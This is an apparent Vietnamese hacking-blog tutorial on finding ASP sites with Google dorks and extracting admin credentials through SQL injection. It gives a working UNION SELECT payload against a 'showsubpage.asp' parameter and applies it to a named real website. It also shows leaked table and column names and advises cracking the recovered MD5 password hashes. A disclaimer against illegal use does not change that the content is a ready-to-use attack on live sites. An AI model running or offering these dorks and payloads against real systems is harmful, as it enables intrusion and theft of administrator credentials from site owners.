Google Dork : inurl:Default.aspx?PageID=
Dang khai thác đối với aspx ở dork này tương tự như trong
tut sau:
Sau đây là 1 số site dính lỗi này:
Tham khảo: http://1337day.com/exploits/18665
Blog được tạo ra nhằm mục đích demo các kỹ thuật hack website dưới dạng Tut- và 1 số vấn đề liên quan đến Hacking Tạo một sân chơi lành mạnh và không gian học tập & trao đổi dành cho các bạn có niềm đam mê Hacking và Security. Tác giả không khuyến cáo bạn đọc sử dụng những kỹ thuật này để thâm nhập bất hợp pháp vào các hệ thông, đánh sập các website Việt cũng như không chịu bất kỳ trách nhiệm gì trước mọi hành vi mang tính chất phá hoại của độc giả!
Google Dork : inurl:Default.aspx?PageID=
inurl:"showsubpage.asp" "Powered By: WebX"
null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
vào sau http://www.victim.com/showsubpage.asp?subid=
- Nếu site dính bug này, nó sẽ hiện thi thông tin username và password được mã hóa MD5 của admin
Ví dụ:
http://www.erdf.edu.in/showsubpage.asp?subid=null+and+1=2+union+select+1,2,3,4,5,pass,login,8,9,10,11,12,13,14,15,16,17+from+admin+where+id=1
- Để giải mã pass bị mã hóa md5 đó, bạn có thể vứt đoạn mã đó lên google
Unclosed quotation mark after the character string ''
tbl_config,tbl_content,tbl_content_category,tbl_member,tbl_order,tbl_order_detail,tbl_product,tbl_product_category,tbl_product_new,tbl_product_special,tbl_user,tbl_visitor
id,uid,pwd